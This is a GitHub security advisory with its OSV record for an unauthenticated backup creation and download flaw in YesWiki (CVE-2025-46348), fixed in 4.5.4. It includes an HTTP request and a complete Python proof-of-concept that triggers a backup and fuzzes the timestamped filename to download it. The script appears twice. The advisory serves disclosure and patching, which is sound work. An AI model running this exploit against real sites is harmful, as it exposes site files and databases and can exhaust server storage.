GHSA-wc9g-6j9w-hr95
Vulnerability from GitHub
Published: 2025-04-29 14:41
Modified: 2025-04-29 14:41
Severity: Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Summary: YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download
Details

Summary

The request to start a site backup can be made without authentication, and the resulting backups can then also be downloaded without authentication.

The archives are created with predictable filenames, so a malicious user could create an archive and then download it without ever authenticating.
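As a minimal sketch of why this matters, assuming an attacker can guess the creation time to within a few seconds, the candidate names can be enumerated directly from the timestamp pattern (`%Y-%m-%dT%H-%M-%S_archive.zip`, matching the example URL below; the window size here is an illustrative assumption):

```
# Sketch: enumerate candidate archive filenames around a guessed creation time.
# The pattern matches the example URL in the Details section; the +/-15 second
# window is an illustrative assumption.
import datetime

guess = datetime.datetime(2025, 4, 12, 14, 34, 0)  # guessed creation time
candidates = [
    (guess + datetime.timedelta(seconds=s)).strftime("%Y-%m-%dT%H-%M-%S_archive.zip")
    for s in range(-15, 16)
]
print(candidates[0], "...", candidates[-1])
```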

Details

Create an installation using the instructions found in the docker folder of the repository, set up the site, and then send the request to create an archive, for which no authentication is needed:

```
POST /?api/archives HTTP/1.1
Host: localhost:8085

action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true
```

Then, to retrieve it, make a simple `GET` request to the correct URL:

```
http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip
```

A malicious attacker could simply fuzz this filename.

PoC

Here is a Python script to fuzz this:

```
#!/usr/bin/env python3

import requests
import argparse
import datetime
import time
from urllib.parse import urljoin
from email.utils import parsedate_to_datetime

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Hardcoded proxy config for Burp Suite
BURP_PROXIES = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

def send_post_request(base_url, use_proxy=False):
    url = urljoin(base_url, "/?api/archives")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
    }

    data = {
        "action": "startArchive",
        "params[savefiles]": "true",
        "params[savedatabase]": "true",
        "callAsync": "true"
    }

    proxies = BURP_PROXIES if use_proxy else None
    response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
    print(f"[+] Archive start response code: {response.status_code}")

    # Use the server's own clock (Date header) so the filename guess is not
    # thrown off by clock skew between attacker and server.
    server_date = response.headers.get("Date")
    if server_date:
        ts = parsedate_to_datetime(server_date)
        print(f"[✓] Server time (from Date header): {ts.strftime('%Y-%m-%d %H:%M:%S')} UTC")
        return ts
    else:
        print("[!] Server did not return a Date header, falling back to local UTC.")
        return datetime.datetime.utcnow()

def try_download_files(base_url, timestamp, use_proxy=False):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
    }

    proxies = BURP_PROXIES if use_proxy else None
    print("[*] Trying to download the archive with timestamp fuzzing (-4 to +14 seconds)...")

    # The test server names archives in local time (UTC+2 here);
    # adjust this offset for the target's timezone.
    base_ts = timestamp + datetime.timedelta(hours=2)

    time.sleep(30)  # give the server time to generate the archive

    for offset in range(-4, 15):
        ts = base_ts + datetime.timedelta(seconds=offset)
        filename = ts.strftime("%Y-%m-%dT%H-%M-%S_archive.zip")
        url = urljoin(base_url, f"/?api/archives/{filename}")
        print(f"[>] Trying: {url}")
        r = requests.get(url, headers=headers, proxies=proxies, verify=False)

        if r.status_code == 200 and r.headers.get("Content-Type", "").startswith("application/zip"):
            print(f"[✓] Archive found and downloaded: {filename}")
            with open(filename, "wb") as f:
                f.write(r.content)
            return

    print("[!] No archive found within the fuzzed window.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Trigger archive and fetch resulting file with timestamp fuzzing.")
    parser.add_argument("host", help="Base host URL, e.g., http://localhost:8085")
    parser.add_argument("-p", "--proxy", action="store_true", help="Route requests through Burp Suite proxy at 127.0.0.1:8080")
    args = parser.parse_args()

    ts = send_post_request(args.host, use_proxy=args.proxy)
    print(f"[+] Archive request sent at (UTC): {ts.strftime('%Y-%m-%d %H:%M:%S')}")

    try_download_files(args.host, ts, use_proxy=args.proxy)
```
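Assuming the script is saved as `poc.py` (the filename is illustrative), it can be run against the Docker test instance like so:

```
python3 poc.py http://localhost:8085
python3 poc.py http://localhost:8085 -p    # optionally route through Burp at 127.0.0.1:8080
```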

Impact

Denial of Service - A malicious attacker could simply make repeated archive-creation requests and fill the server's file system with backups.

Site Compromise - A malicious attacker can download an archive, which contains sensitive site information (the backup can include both the site files and the database).

Full advisory record (OSV format) from the source website:


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "yeswiki/yeswiki"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-29T14:41:31Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. \n\nThe archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. \n\n### Details\n\nCreate an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: \n\n```\nPOST /?api/archives HTTP/1.1\nHost: localhost:8085\n\naction=startArchive\u0026params%5Bsavefiles%5D=true\u0026params%5Bsavedatabase%5D=true\u0026callAsync=true\n```\nThen to retrieve it, make a simple `GET` request like to the correct URL: \n```\nhttp://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip\n```\nA malicious attacker could simply fuzz this filename.\n\n### PoC\nHere is a python script to fuzz this: \n\n```\n#!/usr/bin/env python3\n\nimport requests\nimport argparse\nimport datetime\nimport time\nfrom urllib.parse import urljoin\nfrom email.utils import parsedate_to_datetime\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n# Hardcoded proxy config for Burp Suite\nBURP_PROXIES = {\n    \"http\": \"http://127.0.0.1:8080\",\n    \"https\": \"http://127.0.0.1:8080\"\n}\n\ndef send_post_request(base_url, use_proxy=False):\n    url = urljoin(base_url, \"/?api/archives\")\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    data = {\n        \"action\": \"startArchive\",\n        \"params[savefiles]\": \"true\",\n        \"params[savedatabase]\": \"true\",\n        \"callAsync\": \"true\"\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)\n    print(f\"[+] Archive start response code: {response.status_code}\")\n\n    server_date = response.headers.get(\"Date\")\n    if server_date:\n        ts = parsedate_to_datetime(server_date)\n        print(f\"[\u2713] Server time (from Date header): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)} UTC\")\n        return ts\n    else:\n        print(\"[!] 
Server did not return a Date header, falling back to local UTC.\")\n        return datetime.datetime.utcnow()\n\ndef try_download_files(base_url, timestamp, use_proxy=False):\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    print(\"[*] Trying to download the archive with timestamp fuzzing (\u00b110 seconds)...\")\n\n    base_ts = timestamp + datetime.timedelta(hours=2)\n\n    time.sleep(30)  # delay to generate the archive\n\n    for offset in range(-4, 15):\n        ts = base_ts + datetime.timedelta(seconds=offset)\n        filename = ts.strftime(\"%Y-%m-%dT%H-%M-%S_archive.zip\")\n        url = urljoin(base_url, f\"/?api/archives/{filename}\")\n        print(f\"[\u003e] Trying: {url}\")\n        r = requests.get(url, headers=headers, proxies=proxies, verify=False)\n\n        if r.status_code == 200 and r.headers.get(\"Content-Type\", \"\").startswith(\"application/zip\"):\n            print(f\"[\u2713] Archive found and downloaded: {filename}\")\n            with open(filename, \"wb\") as f:\n                f.write(r.content)\n            return\n\n    print(\"[!] No archive found within the fuzzed window.\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Trigger archive and fetch resulting file with timestamp fuzzing.\")\n    parser.add_argument(\"host\", help=\"Base host URL, e.g., http://localhost:8085\")\n    parser.add_argument(\"-p\", \"--proxy\", action=\"store_true\", help=\"Route requests through Burp Suite proxy at 127.0.0.1:8080\")\n    args = parser.parse_args()\n\n    ts = send_post_request(args.host, use_proxy=args.proxy)\n    print(f\"[+] Archive request sent at (UTC): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\")\n\n    try_download_files(args.host, ts, use_proxy=args.proxy)\n```\n\n### Impact\n\nDenial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives. \n\nSite Compromise - A malicious attacker can download the archive which will contain sensitive site information.",
  "id": "GHSA-wc9g-6j9w-hr95",
  "modified": "2025-04-29T14:41:31Z",
  "published": "2025-04-29T14:41:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wc9g-6j9w-hr95"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YesWiki/yeswiki"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download"
}
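The record above follows the OSV schema (version 1.4.0), so it can be consumed programmatically. As a minimal sketch, assuming the JSON is saved as `ghsa-wc9g-6j9w-hr95.json` (an illustrative filename) and the third-party `packaging` library is installed, an installed version can be checked against the affected range:

```
# Minimal sketch (not an official OSV client): check an installed
# yeswiki/yeswiki version against this record's ECOSYSTEM range.
import json
from packaging.version import Version  # assumes 'packaging' is installed

with open("ghsa-wc9g-6j9w-hr95.json") as f:  # illustrative filename
    record = json.load(f)

installed = Version("4.5.3")  # example version to check
for affected in record["affected"]:
    for rng in affected["ranges"]:
        if rng["type"] != "ECOSYSTEM":
            continue
        introduced, fixed = None, None
        for event in rng["events"]:
            introduced = event.get("introduced", introduced)
            fixed = event.get("fixed", fixed)
        vulnerable = (Version(introduced) <= installed
                      and (fixed is None or installed < Version(fixed)))
        name = affected["package"]["name"]
        print(f"{name} {installed}: {'vulnerable' if vulnerable else 'not affected'}")
```

For this record, any version at or below 4.5.3 reports as vulnerable, and 4.5.4 (the fixed release) does not.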

